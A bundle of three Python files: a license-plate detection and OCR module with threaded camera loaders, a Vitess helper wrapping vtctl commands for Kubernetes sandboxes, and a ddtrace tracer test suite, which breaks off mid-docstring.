self.opt = self._load_config(cfg)
self.imgsz = self.opt.img_size
if isinstance(self.imgsz, int):
self.imgsz = [self.imgsz, self.imgsz]
self.model = onnxruntime.InferenceSession(
self.opt.weights,
providers=['TensorrtExecutionProvider', 'CUDAExecutionProvider', 'CPUExecutionProvider'])
logging.info('Loaded License Plate Detector')
def _load_config(self, cfg):
with open(cfg) as f:
config = yaml.safe_load(f)
econfig = EasyDict(config)
return econfig.test
def detect(self, bgr_img, threshold=0.4):
inp = letterbox(bgr_img, new_shape=self.imgsz, stride=64, auto=False)[0]
inp = inp[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
inp = inp.astype('float32') / 255.0 # 0 - 255 to 0.0 - 1.0
inp = np.expand_dims(inp, 0)
ort_inputs = {self.model.get_inputs()[0].name: inp}
pred = self.model.run(None, ort_inputs)[0]
pred = non_max_suppression(pred, conf_thres=threshold, iou_thres=0.6)
# Process detections
det = pred[0] # detections per image
bboxes = []
scores = []
classes = []
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
_, _, height, width = inp.shape
h, w, _ = bgr_img.shape
det[:, 0] *= w/width
det[:, 1] *= h/height
det[:, 2] *= w/width
det[:, 3] *= h/height
# x1, y1, x2, y2 in pixel format
for x1, y1, x2, y2, conf, cls in det:
bboxes.append((x1, y1, x2, y2))
scores.append(conf)
classes.append(cls)
return bboxes, scores, classes
class LicensePlateRecognizer:
def __init__(self) -> None:
self.rec = keras_ocr.pipeline.Pipeline()
def recognize(self, image):
images = [image]
prediction_groups = self.rec.recognize(images)[0]
        texts = []
        bboxes = []
        bbox = []  # default return value when nothing is recognized
        if len(prediction_groups):
cluster = DBSCAN()
data = []
xs = []
for text, predictions in prediction_groups:
box = cv2.boundingRect(predictions.reshape(-1, 1, 2))
                height = box[3]  # cv2.boundingRect returns (x, y, w, h)
data.append(height)
texts.append(text)
xs.append(box[0])
bboxes.append(box)
data = np.array(data).reshape(-1, 1)
cluster.fit(data)
labels = cluster.labels_
avg_heights = {}
uniq_labels = np.unique(labels)
            for label in uniq_labels:
                avg_heights[label] = np.mean(data[labels == label])
            # Keep the cluster with the largest average text height (the plate
            # characters), then sort its words left-to-right by x position.
            pos_label = sorted(avg_heights.items(), key=lambda x: x[1])[-1][0]
            indices = np.where(labels == pos_label)[0]
            texts = [texts[i] for i in indices]
            xs = [xs[i] for i in indices]
            bboxes = [bboxes[i] for i in indices]
            sorted_indices = np.argsort(xs)
            texts = [texts[i] for i in sorted_indices]
            bboxes = [bboxes[i] for i in sorted_indices]
            bboxes = np.array(bboxes)
            text = ','.join(texts)
            # Boxes are (x, y, w, h), so the enclosing box is
            # [min x, min y, max x + w, max y + h].
            bbox = [np.min(bboxes[:, 0]),
                    np.min(bboxes[:, 1]),
                    np.max(bboxes[:, 0] + bboxes[:, 2]),
                    np.max(bboxes[:, 1] + bboxes[:, 3])]
return texts, bbox
class StreamInitializationError(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
class Stream:
"""Use threading to capture a frame from camera for faster frame load.
Recommend for camera or webcam.
Args:
camera: (int, str) Source of camera or video.,
preprocess: (Callable function) to process the frame before return.
"""
def __init__(self, source, preprocess=None, ori_return=False):
self.source = source
self.stream = cv2.VideoCapture(source)
assert self.stream.isOpened(), f'Cannot read camera source! {source}'
self.fps = self.stream.get(cv2.CAP_PROP_FPS)
self.frame_size = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
self.stopped = False
self.ret = False
self.frame = None
self.ori_frame = None
self.read_lock = Lock()
self.ori = ori_return
self.preprocess_fn = preprocess
def start(self):
self.t = Thread(target=self.update, args=()) # , daemon=True)
self.t.start()
c = 0
while not self.ret:
time.sleep(0.1)
c += 1
if c > 20:
self.stop()
# raise TimeoutError('Can not get a frame from camera!!!')
logging.error(f'Can not read frame from {self.source}')
break
return self
def update(self):
while not self.stopped:
ret, frame = self.stream.read()
self.read_lock.acquire()
if frame is None:
logging.warning(f'Failed to read frame from {self.source}')
self.read_lock.release()
continue
self.ori_frame = frame.copy()
if ret and self.preprocess_fn is not None:
frame = self.preprocess_fn(frame)
self.ret, self.frame = ret, frame
self.read_lock.release()
time.sleep(30)
def grabbed(self):
"""Return `True` if can read a frame."""
return self.ret
def getitem(self):
self.read_lock.acquire()
frame = self.frame.copy()
ori_frame = self.ori_frame.copy()
self.read_lock.release()
if self.ori:
return frame, ori_frame
else:
return frame
def stop(self):
if self.stopped:
return
self.stopped = True
if self.t.is_alive():
self.t.join()
self.stream.release()
def is_running(self):
return not self.stopped
def __del__(self):
if self.stream.isOpened():
self.stream.release()
def __exit__(self, exc_type, exc_val, exc_tb):
if self.stream.isOpened():
self.stream.release()
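# Minimal usage sketch for Stream (illustrative only; the camera index 0 and the
# resize preprocessing step are assumptions, not part of this pipeline):
#
#     stream = Stream(0, preprocess=lambda f: cv2.resize(f, (640, 480))).start()
#     try:
#         while stream.is_running() and stream.grabbed():
#             frame = stream.getitem()   # latest preprocessed frame
#             ...                        # run detection on `frame`
#     finally:
#         stream.stop()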
class CamLoader_Q:
"""Use threading and queue to capture a frame and store to queue for pickup in sequence.
Recommend for video file.
Args:
camera: (int, str) Source of camera or video.,
batch_size: (int) Number of batch frame to store in queue. Default: 1,
queue_size: (int) Maximum queue size. Default: 256,
preprocess: (Callable function) to process the frame before return.
"""
def __init__(self, camera, batch_size=1, queue_size=256, preprocess=None):
self.stream = cv2.VideoCapture(camera)
assert self.stream.isOpened(), 'Cannot read camera source!'
self.fps = self.stream.get(cv2.CAP_PROP_FPS)
self.frame_size = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
# Queue for storing each frames.
self.stopped = False
self.batch_size = batch_size
self.Q = Queue(maxsize=queue_size)
self.preprocess_fn = preprocess
def start(self):
        t = Thread(target=self.update, args=(), daemon=True)
        t.start()
c = 0
while not self.grabbed():
time.sleep(0.1)
c += 1
if c > 20:
self.stop()
raise TimeoutError('Can not get a frame from camera!!!')
return self
def update(self):
while not self.stopped:
if not self.Q.full():
frames = []
for k in range(self.batch_size):
ret, frame = self.stream.read()
if not ret:
self.stop()
return
if self.preprocess_fn is not None:
frame = self.preprocess_fn(frame)
frames.append(frame)
frames = np.stack(frames)
self.Q.put(frames)
else:
with self.Q.mutex:
self.Q.queue.clear()
# time.sleep(0.05)
def grabbed(self):
"""Return `True` if can read a frame."""
return self.Q.qsize() > 0
def getitem(self):
return self.Q.get().squeeze()
def stop(self):
if self.stopped:
return
self.stopped = True
self.stream.release()
def __len__(self):
return self.Q.qsize()
def __del__(self):
if self.stream.isOpened():
self.stream.release()
def __exit__(self, exc_type, exc_val, exc_tb):
if self.stream.isOpened():
self.stream.release()
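# Minimal usage sketch for CamLoader_Q (illustrative only; the file name is an
# assumption). Frames are consumed in order from the internal queue, which suits
# offline video files rather than live cameras:
#
#     loader = CamLoader_Q('video.mp4', batch_size=1, queue_size=256).start()
#     while loader.grabbed():
#         frame = loader.getitem()   # next frame, in source order
#         ...                        # process the frame
#     loader.stop()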
|
vtctl_sandbox.py
|
# Copyright 2019 The Vitess Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrapper around vtctl execute_vtctl_command for sandboxes.
Note: This also provides a backup option of using kvtctl.sh, a kubernetes script
used to temporarily forward a port if vtctld has no forwarded port.
TODO(thompsonja): This is heavily tied to Kubernetes and will need to be
updated if other systems are used.
"""
import json
import os
import subprocess
import threading
import time
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.stdout = None
self.stderr = None
def run(self, timeout_s):
"""Runs the vtctl command."""
def target():
self.process = subprocess.Popen(self.cmd, stdout=subprocess.PIPE)
self.stdout, self.stderr = self.process.communicate()
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout_s)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.process.returncode
def execute_vtctl_command(vtctl_args, namespace='default', timeout_s=180):
"""Executes a vtctl command with some retry logic."""
vtctl_cmd_args = []
vtctld_info = json.loads(subprocess.check_output(
['kubectl', 'get', 'service', 'vtctld', '--namespace=%s' % namespace,
'-o', 'json']))
try:
# Check to see if the vtctld service has a forwarded port.
ip = vtctld_info['status']['loadBalancer']['ingress'][0]['ip']
vtctl_cmd_args = ['vtctlclient', '-server', '%s:15999' % ip] + vtctl_args
except (KeyError, IndexError):
pass
if not vtctl_cmd_args:
# Default to trying to use kvtctl.sh if a forwarded port cannot be found.
os.environ['VITESS_NAME'] = namespace
vtctl_cmd_args = (
[os.path.join(os.environ['VTTOP'], 'examples/kubernetes/kvtctl.sh')]
+ vtctl_args)
start_time = time.time()
while time.time() - start_time < timeout_s:
cmd = Command(vtctl_cmd_args)
retcode = cmd.run(10)
if cmd.stdout.startswith('Starting port forwarding'):
# Ignore this extra output line if using kvtctl.sh
cmd.stdout = cmd.stdout[cmd.stdout.find('\n')+1:]
if retcode:
last_error = 'Failed w/ errorcode %d, stdout %s, stderr %s' % (
cmd.process.returncode, cmd.stdout, cmd.stderr)
else:
return cmd.stdout, True
return ('Last error running %s: %s' % (' '.join(vtctl_cmd_args), last_error),
False)
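# Minimal usage sketch (illustrative only; the command, keyspace and namespace are
# assumptions): run a vtctl command against the sandbox and check the result.
#
#   output, success = execute_vtctl_command(
#       ['ListAllTablets', 'test_keyspace'], namespace='vitess', timeout_s=60)
#   if not success:
#     print('vtctl command failed: %s' % output)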
|
test_tracer.py
|
# -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
import warnings
from unittest.case import SkipTest
import mock
import pytest
from ddtrace.vendor import six
import ddtrace
from ddtrace.tracer import Tracer
from ddtrace.ext import system, priority
from ddtrace.context import Context
from ddtrace.constants import (
VERSION_KEY,
ENV_KEY,
SAMPLING_PRIORITY_KEY,
ORIGIN_KEY,
HOSTNAME_KEY,
MANUAL_KEEP_KEY,
MANUAL_DROP_KEY,
)
from tests.subprocesstest import run_in_subprocess
from tests import TracerTestCase, DummyWriter, DummyTracer, override_global_config
from ddtrace.internal.writer import LogWriter, AgentWriter
def get_dummy_tracer():
return DummyTracer()
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
# a weird case where manually calling finish with an unserializable
# span was causing an loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.get_call_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
# Tracer Context Provider must return a Context object
# even if empty
ctx = self.tracer.context_provider.active()
assert isinstance(ctx, Context)
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.start_span("web.request")
span.assert_matches(
name="web.request",
tracer=self.tracer,
_parent=None,
parent_id=None,
)
span.finish()
assert self.tracer.active_span() == span
assert self.tracer.active_root_span() == span
spans = self.tracer.writer.pop()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided a default
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
assert self.tracer.current_span() == child
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=root,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_runtime_worker(self):
# by default runtime worker not started though runtime id is set
self.assertIsNone(self.tracer._runtime_worker)
# configure tracer with runtime metrics collection
self.tracer.configure(collect_metrics=True)
self.assertIsNotNone(self.tracer._runtime_worker)
def test_configure_dogstatsd_host(self):
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
self.tracer.configure(dogstatsd_host="foo")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 8125
# verify warnings triggered
assert len(ws) >= 1
for w in ws:
if issubclass(w.category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning):
assert "Use `dogstatsd_url`" in str(w.message)
break
else:
assert 0, "dogstatsd warning not found"
def test_configure_dogstatsd_host_port(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.tracer.configure(dogstatsd_host="foo", dogstatsd_port="1234")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 1234
# verify warnings triggered
assert len(w) >= 2
assert issubclass(w[0].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert "Use `dogstatsd_url`" in str(w[0].message)
assert issubclass(w[1].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert "Use `dogstatsd_url`" in str(w[1].message)
def test_configure_dogstatsd_url_host_port(self):
self.tracer.configure(dogstatsd_url="foo:1234")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 1234
def test_configure_dogstatsd_url_socket(self):
self.tracer.configure(dogstatsd_url="unix:///foo.sock")
assert self.tracer._dogstatsd_client.host is None
assert self.tracer._dogstatsd_client.port is None
assert self.tracer._dogstatsd_client.socket_path == "/foo.sock"
def test_span_no_runtime_tags(self):
self.tracer.configure(collect_metrics=False)
with self.start_span("root") as root:
with self.start_span("child", child_of=root.context) as child:
pass
self.assertIsNone(root.get_tag("language"))
self.assertIsNone(child.get_tag("language"))
def test_only_root_span_runtime_internal_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("custom", "template", "web", "worker"):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") == "python"
assert child.get_tag("language") is None
def test_only_root_span_runtime_external_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in (
"algoliasearch.search",
"boto",
"cache",
"cassandra",
"elasticsearch",
"grpc",
"kombu",
"http",
"memcached",
"redis",
"sql",
"vertica",
):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") is None
assert child.get_tag("language") is None
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer._hostname == "localhost"
assert t.writer._port == 8126
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer._hostname == "foobar"
assert t.writer._port == 12
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer._uds_path == "/foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer._hostname == "localhost"
assert t.writer._port == 80
assert not t.writer._https
t = ddtrace.Tracer(url="https://localhost")
assert t.writer._hostname == "localhost"
assert t.writer._port == 443
assert t.writer._https
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert str(e) == "Unknown scheme `https` for agent URL"
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert not t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=None)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Make sure we aren't calling stop for an unstarted writer
t.configure(hostname="localhost", port=8126)
assert not orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t._dogstatsd_client.host == "localhost"
assert t._dogstatsd_client.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t._dogstatsd_client.host == "foobar"
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t._dogstatsd_client.host == "foobar"
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t._dogstatsd_client.socket_path == "/var/run/statsd.sock"
t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t._dogstatsd_client.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer != original_writer
assert t.writer._buffer != original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 0
assert len(t.writer._buffer) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._buffer == original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 1
assert len(t.writer._buffer) == 1
def test_tracer_trace_across_fork():
"""
When a trace is started in a parent process and a child process is spawned
The trace should be continued in the child process
"""
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
def task(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 1
(child,) = children
assert parent.trace_id == child["trace_id"]
assert child["parent_id"] == parent.span_id
def test_tracer_trace_across_multiple_forks():
"""
When a trace is started and crosses multiple process boundaries
The trace should be continued in the child processes
"""
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
# Start a span in this process then start a child process which itself
# starts a span and spawns another child process which starts a span.
def task(tracer, q):
tracer.writer = DummyWriter()
def task2(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child2"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
with tracer.trace("child1"):
q2 = multiprocessing.Queue()
p = multiprocessing.Process(target=task2, args=(tracer, q2))
p.start()
p.join()
task2_spans = q2.get()
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id, span_id=s.span_id) for s in spans] + task2_spans)
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 2
child1, child2 = children
assert parent.trace_id == child1["trace_id"] == child2["trace_id"]
assert child1["parent_id"] == parent.span_id
assert child2["parent_id"] == child1["span_id"]
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
